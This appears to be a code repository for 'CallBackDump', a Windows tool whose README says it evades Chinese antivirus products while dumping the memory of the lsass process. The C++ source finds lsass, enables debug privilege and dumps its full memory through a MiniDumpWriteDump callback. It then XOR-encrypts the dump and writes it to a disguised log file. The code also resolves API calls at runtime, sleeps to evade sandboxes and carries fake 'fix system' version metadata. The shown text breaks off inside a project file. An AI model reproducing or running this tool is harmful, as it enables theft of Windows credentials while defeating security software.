[
  {
    "path": "CallbackDump/CallbackDump/CallbackDump.rc",
    "content": "// Microsoft Visual C++ generated resource script.\r\n//\r\n#include \"resource.h\"\r\n\r\n#define APSTUDIO_READONLY_SYMBOLS\r\n/////////////////////////////////////////////////////////////////////////////\r\n//\r\n// Generated from the TEXTINCLUDE 2 resource.\r\n//\r\n#include \"winres.h\"\r\n\r\n/////////////////////////////////////////////////////////////////////////////\r\n#undef APSTUDIO_READONLY_SYMBOLS\r\n\r\n/////////////////////////////////////////////////////////////////////////////\r\n// (壬й) resources\r\n\r\n#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_CHS)\r\nLANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED\r\n#pragma code_page(936)\r\n\r\n#ifdef APSTUDIO_INVOKED\r\n/////////////////////////////////////////////////////////////////////////////\r\n//\r\n// TEXTINCLUDE\r\n//\r\n\r\n1 TEXTINCLUDE \r\nBEGIN\r\n    \"resource.h\\0\"\r\nEND\r\n\r\n2 TEXTINCLUDE \r\nBEGIN\r\n    \"#include \"\"winres.h\"\"\\r\\n\"\r\n    \"\\0\"\r\nEND\r\n\r\n3 TEXTINCLUDE \r\nBEGIN\r\n    \"\\r\\n\"\r\n    \"\\0\"\r\nEND\r\n\r\n#endif    // APSTUDIO_INVOKED\r\n\r\n\r\n/////////////////////////////////////////////////////////////////////////////\r\n//\r\n// Version\r\n//\r\n\r\nVS_VERSION_INFO VERSIONINFO\r\n FILEVERSION 2,1,6,6\r\n PRODUCTVERSION 2,1,6,6\r\n FILEFLAGSMASK 0x3fL\r\n#ifdef _DEBUG\r\n FILEFLAGS 0x1L\r\n#else\r\n FILEFLAGS 0x0L\r\n#endif\r\n FILEOS 0x40004L\r\n FILETYPE 0x1L\r\n FILESUBTYPE 0x0L\r\nBEGIN\r\n    BLOCK \"StringFileInfo\"\r\n    BEGIN\r\n        BLOCK \"080404b0\"\r\n        BEGIN\r\n            VALUE \"CompanyName\", \"system\"\r\n            VALUE \"FileDescription\", \"system\"\r\n            VALUE \"FileVersion\", \"2.1.6.6\"\r\n            VALUE \"InternalName\", \"fixSystem.exe\"\r\n            VALUE \"LegalCopyright\", \"Copyright (C) 2022\"\r\n            VALUE \"OriginalFilename\", \"Callback.exe\"\r\n            VALUE \"ProductName\", \"fix system\"\r\n            VALUE \"ProductVersion\", \"2.1.6.6\"\r\n        END\r\n    END\r\n    BLOCK \"VarFileInfo\"\r\n    BEGIN\r\n        VALUE \"Translation\", 0x804, 1200\r\n    END\r\nEND\r\n\r\n#endif    // (壬й) resources\r\n/////////////////////////////////////////////////////////////////////////////\r\n\r\n\r\n\r\n#ifndef APSTUDIO_INVOKED\r\n/////////////////////////////////////////////////////////////////////////////\r\n//\r\n// Generated from the TEXTINCLUDE 3 resource.\r\n//\r\n\r\n\r\n/////////////////////////////////////////////////////////////////////////////\r\n#endif    // not APSTUDIO_INVOKED\r\n\r\n"
  },
  {
    "path": "CallbackDump/CallbackDump/CallbackDump.vcxproj",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <ItemGroup Label=\"ProjectConfigurations\">\r\n    <ProjectConfiguration Include=\"Debug|Win32\">\r\n      <Configuration>Debug</Configuration>\r\n      <Platform>Win32</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Release|Win32\">\r\n      <Configuration>Release</Configuration>\r\n      <Platform>Win32</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Debug|x64\">\r\n      <Configuration>Debug</Configuration>\r\n      <Platform>x64</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Release|x64\">\r\n      <Configuration>Release</Configuration>\r\n      <Platform>x64</Platform>\r\n    </ProjectConfiguration>\r\n  </ItemGroup>\r\n  <PropertyGroup Label=\"Globals\">\r\n    <VCProjectVersion>16.0</VCProjectVersion>\r\n    <Keyword>Win32Proj</Keyword>\r\n    <ProjectGuid>{ae20b179-5a3a-4aa9-96fa-acccb1c721e5}</ProjectGuid>\r\n    <RootNamespace>CallbackDump</RootNamespace>\r\n    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>\r\n  </PropertyGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>true</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>false</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <WholeProgramOptimization>true</WholeProgramOptimization>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>true</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>false</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <WholeProgramOptimization>true</WholeProgramOptimization>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\r\n  <ImportGroup Label=\"ExtensionSettings\">\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"Shared\">\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <PropertyGroup Label=\"UserMacros\" />\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <FunctionLevelLinking>true</FunctionLevelLinking>\r\n      <IntrinsicFunctions>true</IntrinsicFunctions>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\r\n      <OptimizeReferences>true</OptimizeReferences>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <FunctionLevelLinking>true</FunctionLevelLinking>\r\n      <IntrinsicFunctions>true</IntrinsicFunctions>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>\r\n      <BufferSecurityCheck>false</BufferSecurityCheck>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\r\n      <OptimizeReferences>true</OptimizeReferences>\r\n      <GenerateDebugInformation>false</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemGroup>\r\n    <ClCompile Include=\"main.cpp\" />\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClInclude Include=\"global.h\" />\r\n    <ClInclude Include=\"resource.h\" />\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ResourceCompile Include=\"CallbackDump.rc\" />\r\n  </ItemGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\r\n  <ImportGroup Label=\"ExtensionTargets\">\r\n  </ImportGroup>\r\n</Project>"
  },
  {
    "path": "CallbackDump/CallbackDump/CallbackDump.vcxproj.filters",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <ItemGroup>\r\n    <Filter Include=\"源文件\">\r\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\r\n      <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\r\n    </Filter>\r\n    <Filter Include=\"头文件\">\r\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\r\n      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>\r\n    </Filter>\r\n    <Filter Include=\"资源文件\">\r\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\r\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\r\n    </Filter>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClCompile Include=\"main.cpp\">\r\n      <Filter>源文件</Filter>\r\n    </ClCompile>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClInclude Include=\"global.h\">\r\n      <Filter>头文件</Filter>\r\n    </ClInclude>\r\n    <ClInclude Include=\"resource.h\">\r\n      <Filter>头文件</Filter>\r\n    </ClInclude>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ResourceCompile Include=\"CallbackDump.rc\">\r\n      <Filter>资源文件</Filter>\r\n    </ResourceCompile>\r\n  </ItemGroup>\r\n</Project>"
  },
  {
    "path": "CallbackDump/CallbackDump/CallbackDump.vcxproj.user",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <PropertyGroup />\r\n</Project>"
  },
  {
    "path": "CallbackDump/CallbackDump/global.h",
    "content": "#pragma once\r\n\r\n\r\ntypedef NTSTATUS(WINAPI* _RtlAdjustPrivilege)(\r\n\tULONG Privilege, BOOL Enable,\r\n\tBOOL CurrentThread, PULONG Enabled);\r\n\r\n_RtlAdjustPrivilege MRtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress(\r\n    GetModuleHandleW(L\"ntdll.dll\"), \"RtlAdjustPrivilege\");\r\n\r\ntypedef LPVOID(WINAPI* _HeapAlloc)(\r\n    HANDLE hHeap , DWORD  dwFlags,\r\n    SIZE_T dwBytes);\r\n\r\n_HeapAlloc MHeapAlloc = (_HeapAlloc)GetProcAddress(\r\n    GetModuleHandleW(L\"Kernel32.dll\"), \"HeapAlloc\");\r\n\r\ntypedef HANDLE(WINAPI* _CreateToolhelp32Snapshot)(\r\n    DWORD dwFlags, DWORD th32ProcessID);\r\n\r\n_CreateToolhelp32Snapshot MCreateToolhelp32Snapshot = (_CreateToolhelp32Snapshot)GetProcAddress(\r\n    GetModuleHandleW(L\"Kernel32.dll\"), \"CreateToolhelp32Snapshot\");\r\n\r\ntypedef BOOL(WINAPI* _Process32FirstW)(\r\n    HANDLE hSnapshot, LPPROCESSENTRY32W lppe);\r\n\r\n_Process32FirstW MProcess32FirstW = (_Process32FirstW)GetProcAddress(\r\n    GetModuleHandleW(L\"Kernel32.dll\"), \"Process32FirstW\");\r\n\r\n\r\ntypedef BOOL(WINAPI* _Process32NextW)(\r\n    HANDLE hSnapshot, LPPROCESSENTRY32W lppe);\r\n\r\n_Process32NextW MProcess32NextW = (_Process32NextW)GetProcAddress(\r\n    GetModuleHandleW(L\"Kernel32.dll\"), \"Process32NextW\");\r\n\r\n\r\ntypedef HANDLE(WINAPI* _OpenProcess)(\r\n    DWORD dwDesiredAccess, BOOL  bInheritHandle, DWORD dwProcessId);\r\n\r\n_OpenProcess MOpenProcess = (_OpenProcess)GetProcAddress(\r\n    GetModuleHandleW(L\"Kernel32.dll\"), \"OpenProcess\");\r\n\r\ntypedef BOOL(WINAPI* _MiniDumpWriteDump)(\r\n    HANDLE hProcess, DWORD ProcessId, \r\n    HANDLE hFile, MINIDUMP_TYPE DumpType,\r\n    PMINIDUMP_EXCEPTION_INFORMATION   ExceptionParam, \r\n    PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam, \r\n    PMINIDUMP_CALLBACK_INFORMATION CallbackParam);\r\n\r\n_MiniDumpWriteDump MMiniDumpWriteDump = (_MiniDumpWriteDump)GetProcAddress(\r\n    LoadLibraryA(\"Dbghelp.dll\"), \"MiniDumpWriteDump\");\r\n\r\n\r\nextern char * Xorcrypt(char* content, DWORD length ,char* secretKey)\r\n{\r\n    for (UINT i = 0; i < length; i++)\r\n    {\r\n        content[i] ^= secretKey[i % sizeof(secretKey)];\r\n    }\r\n\r\n    return content;\r\n}\r\n"
  },
  {
    "path": "CallbackDump/CallbackDump/main.cpp",
    "content": "#include <windows.h>\r\n#include <DbgHelp.h>\r\n#include <iostream>\r\n#include <TlHelp32.h>\r\n#include <processsnapshot.h>\r\n#pragma comment (lib, \"Dbghelp.lib\")\r\n#include \"global.h\"\r\n\r\n\r\n// Buffer for saving the minidump\r\nLPVOID buffer = MHeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 1024 * 1024 * 75);\r\nDWORD bytesRead = 0;\r\n\r\n\r\nBOOL CALLBACK minidumpCallback(\r\n\t__in     PVOID callbackParam,\r\n\t__in     const PMINIDUMP_CALLBACK_INPUT callbackInput,\r\n\t__inout  PMINIDUMP_CALLBACK_OUTPUT callbackOutput\r\n)\r\n{\r\n\tLPVOID destination = 0, source = 0;\r\n\tDWORD bufferSize = 0;\r\n\r\n\tswitch (callbackInput->CallbackType)\r\n\t{\r\n\tcase IoStartCallback:\r\n\t\tcallbackOutput->Status = S_FALSE;\r\n\t\tbreak;\r\n\r\n\t\t// Gets called for each lsass process memory read operation\r\n\tcase IoWriteAllCallback:\r\n\t\tcallbackOutput->Status = S_OK;\r\n\r\n\t\t// A chunk of minidump data that's been jus read from lsass. \r\n\t\t// This is the data that would eventually end up in the .dmp file on the disk, but we now have access to it in memory, so we can do whatever we want with it.\r\n\t\t// We will simply save it to dumpBuffer.\r\n\t\tsource = callbackInput->Io.Buffer;\r\n\r\n\t\t// Calculate location of where we want to store this part of the dump.\r\n\t\t// Destination is start of our dumpBuffer + the offset of the minidump data\r\n\t\tdestination = (LPVOID)((DWORD_PTR)buffer + (DWORD_PTR)callbackInput->Io.Offset);\r\n\r\n\t\t// Size of the chunk of minidump that's just been read.\r\n\t\tbufferSize = callbackInput->Io.BufferBytes;\r\n\t\tbytesRead += bufferSize;\r\n\r\n\t\tRtlCopyMemory(destination, source, bufferSize);\r\n\r\n\t\tbreak;\r\n\r\n\tcase IoFinishCallback:\r\n\t\tcallbackOutput->Status = S_OK;\r\n\t\tbreak;\r\n\r\n\tdefault:\r\n\t\treturn true;\r\n\t}\r\n\treturn TRUE;\r\n}\r\n\r\n\r\nvoid nt_wait(DWORD milliseconds)\r\n{\r\n\tstatic NTSTATUS(__stdcall * NtDelayExecution)(BOOL Alertable, PLARGE_INTEGER DelayInterval) = (NTSTATUS(__stdcall*)(BOOL, PLARGE_INTEGER)) GetProcAddress(GetModuleHandleA((\"ntdll.dll\")), (\"NtDelayExecution\"));\r\n\tstatic NTSTATUS(__stdcall * ZwSetTimerResolution)(IN ULONG RequestedResolution, IN BOOLEAN Set, OUT PULONG ActualResolution) = (NTSTATUS(__stdcall*)(ULONG, BOOLEAN, PULONG)) GetProcAddress(GetModuleHandleA((\"ntdll.dll\")), (\"ZwSetTimerResolution\"));\r\n\tstatic bool once = true;\r\n\tif (once && ZwSetTimerResolution != NULL) {\r\n\t\tULONG actualResolution;\r\n\t\tZwSetTimerResolution(1, true, &actualResolution);\r\n\t\tonce = false;\r\n\t}\r\n\tLARGE_INTEGER interval;\r\n\tinterval.QuadPart = -1 * (int)(milliseconds * 10000);\r\n\tif (NtDelayExecution != NULL)\r\n\t{\r\n\t\tNtDelayExecution(false, &interval);\r\n\t}\r\n\r\n}\r\n\r\n\r\nint main(int argc, char* argv[]) {\r\n\r\n\tif (__argc == 1) {\r\n\t\treturn 7899 * 1777;\r\n\t}\r\n\telse if (__argc == 2) {\r\n\t\tif (strcmp(__argv[1], \"to\") != 0)\r\n\t\t{\r\n\t\t\treturn 7 * 12899;\r\n\t\t}\r\n\t}\r\n\telse {\r\n\t\treturn 1717 * 1888;\r\n\t}\r\n\r\n\tnt_wait(10000);\r\n\r\n\tDWORD PID = 0;\r\n\tDWORD bytesWritten = 0;\r\n\tHANDLE lHandle = NULL;\r\n\tHANDLE snapshot = MCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\r\n\tLPCWSTR processName = L\"\";\r\n\tPROCESSENTRY32 processEntry = {};\r\n\tprocessEntry.dwSize = sizeof(PROCESSENTRY32);\r\n\tULONG  t;\r\n\r\n\t// Get lsass PID\r\n\tif (MProcess32FirstW(snapshot, &processEntry)) {\r\n\t\twhile (_wcsicmp(processName, L\"lsass.exe\") != 0) {\r\n\t\t\tMProcess32NextW(snapshot, &processEntry);\r\n\t\t\tprocessName = processEntry.szExeFile;\r\n\t\t\tPID = processEntry.th32ProcessID;\r\n\t\t}\r\n\t}\r\n\r\n\t// enable debug privilege\r\n\tMRtlAdjustPrivilege(20, TRUE, FALSE, &t);\r\n\r\n\tlHandle = MOpenProcess(PROCESS_ALL_ACCESS, 0, PID);\r\n\r\n\t// Set up minidump callback\r\n\tMINIDUMP_CALLBACK_INFORMATION callbackInfo;\r\n\tZeroMemory(&callbackInfo, sizeof(MINIDUMP_CALLBACK_INFORMATION));\r\n\tcallbackInfo.CallbackRoutine = &minidumpCallback;\r\n\tcallbackInfo.CallbackParam = NULL;\r\n\r\n\t// Dump lsass\r\n\tBOOL isD = MMiniDumpWriteDump(lHandle, PID, NULL, MiniDumpWithFullMemory, NULL, NULL, &callbackInfo);\r\n\r\n\tif (isD)\r\n\t{\r\n\t\tlong int size = bytesRead;\r\n\r\n\t\tchar *securitySth = new char[size];\r\n\r\n\t\tchar *key = (char *)\"thisisgood\";\r\n\r\n\t\tmemcpy(securitySth,buffer,bytesRead);\r\n\r\n\t\tsecuritySth = Xorcrypt(securitySth, bytesRead, key);\r\n\r\n\t\t// At this point, we have the lsass dump in memory at location dumpBuffer - we can do whatever we want with that buffer, i.e encrypt & exfiltrate\r\n\t\tHANDLE outFile = CreateFile(L\"C:\\\\Users\\\\Public\\\\Downloads\\\\VM21-6-8.log\", GENERIC_ALL, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);\r\n\r\n\t\t//// For testing purposes, let's write lsass dump to disk from our own dumpBuffer and check if mimikatz can work it\r\n\t\tif (WriteFile(outFile, securitySth, bytesRead, &bytesWritten, NULL))\r\n\t\t{\r\n\t\t\tprintf(\"\\n[+] to C:\\\\Users\\\\Public\\\\Downloads\\\\VM21-6-8.log\\n\");\r\n\t\t}\r\n\r\n\t\tCloseHandle(outFile);\r\n\t}\r\n\r\n\treturn 0;\r\n}"
  },
  {
    "path": "CallbackDump/CallbackDump/resource.h",
    "content": "//{{NO_DEPENDENCIES}}\r\n// Microsoft Visual C++ generated include file.\r\n// Used by CallbackDump.rc\r\n\r\n// ¶һĬֵ\r\n// \r\n#ifdef APSTUDIO_INVOKED\r\n#ifndef APSTUDIO_READONLY_SYMBOLS\r\n#define _APS_NEXT_RESOURCE_VALUE        101\r\n#define _APS_NEXT_COMMAND_VALUE         40001\r\n#define _APS_NEXT_CONTROL_VALUE         1001\r\n#define _APS_NEXT_SYMED_VALUE           101\r\n#endif\r\n#endif\r\n"
  },
  {
    "path": "CallbackDump/CallbackDump.sln",
    "content": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 17\r\nVisualStudioVersion = 17.3.32825.248\r\nMinimumVisualStudioVersion = 10.0.40219.1\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"CallbackDump\", \"CallbackDump\\CallbackDump.vcxproj\", \"{AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}\"\r\nEndProject\r\nGlobal\r\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\r\n\t\tDebug|x64 = Debug|x64\r\n\t\tDebug|x86 = Debug|x86\r\n\t\tRelease|x64 = Release|x64\r\n\t\tRelease|x86 = Release|x86\r\n\tEndGlobalSection\r\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\r\n\t\t{AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Debug|x64.ActiveCfg = Debug|x64\r\n\t\t{AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Debug|x64.Build.0 = Debug|x64\r\n\t\t{AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Debug|x86.ActiveCfg = Debug|Win32\r\n\t\t{AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Debug|x86.Build.0 = Debug|Win32\r\n\t\t{AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Release|x64.ActiveCfg = Release|x64\r\n\t\t{AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Release|x64.Build.0 = Release|x64\r\n\t\t{AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Release|x86.ActiveCfg = Release|Win32\r\n\t\t{AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Release|x86.Build.0 = Release|Win32\r\n\tEndGlobalSection\r\n\tGlobalSection(SolutionProperties) = preSolution\r\n\t\tHideSolutionNode = FALSE\r\n\tEndGlobalSection\r\n\tGlobalSection(ExtensibilityGlobals) = postSolution\r\n\t\tSolutionGuid = {61DC3699-9F4E-4BF9-AB81-CCAF773B4ADA}\r\n\tEndGlobalSection\r\nEndGlobal\r\n"
  },
  {
    "path": "README.md",
    "content": "# CallBackDump\n\n能过国内杀软的dump lsass进程工具，参考代码链接在下面。\n\n由minidumpCallback实现，对缓冲区中内存做了些修改后再写入磁盘，同时做了一些小细节修改。\n\n需要注意的是别扔云沙箱，这工具也没有任何网络行为。\n\n![image-20220928231219634](assets/image-20220928231219634.png)\n\n![image-20220928231615029](assets/image-20220928231615029.png)\n\n![image-20220928231846196](assets/image-20220928231846196.png)\n\n# 环境\n\nVS2022\n\n# 用法\n\n`CallbackDump.exe to` 将lsass进程dump成VM21-6-8.log\n\n`dumpXor.exe VM21-6-8.log 1.bin` 将加密的进程文件解密\n\n# 详解\n\n[Dumping Lsass Process Memory In Different Ways - 跳跳糖](https://tttang.com/archive/1810/)\n\n# 参考链接\n\nhttps://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass\n"
  },
  {
    "path": "dumpXor/dumpXor/dumpXor.vcxproj",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <ItemGroup Label=\"ProjectConfigurations\">\r\n    <ProjectConfiguration Include=\"Debug|Win32\">\r\n      <Configuration>Debug</Configuration>\r\n      <Platform>Win32</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Release|Win32\">\r\n      <Configuration>Release</Configuration>\r\n      <Platform>Win32</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Debug|x64\">\r\n      <Configuration>Debug</Configuration>\r\n      <Platform>x64</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Release|x64\">\r\n      <Configuration>Release</Configuration>\r\n      <Platform>x64</Platform>\r\n    </ProjectConfiguration>\r\n  </ItemGroup>\r\n  <PropertyGroup Label=\"Globals\">\r\n    <VCProjectVersion>16.0</VCProjectVersion>\r\n    <Keyword>Win32Proj</Keyword>\r\n    <ProjectGuid>{9cc63db2-7fc6-4d54-a0e4-cd91e124bfd4}</ProjectGuid>\r\n    <RootNamespace>dumpXor</RootNamespace>\r\n    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>\r\n  </PropertyGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>true</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>false</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <WholeProgramOptimization>true</WholeProgramOptimization>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>true</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>false</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <WholeProgramOptimization>true</WholeProgramOptimization>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\r\n  <ImportGroup Label=\"ExtensionSettings\">\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"Shared\">\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <Import 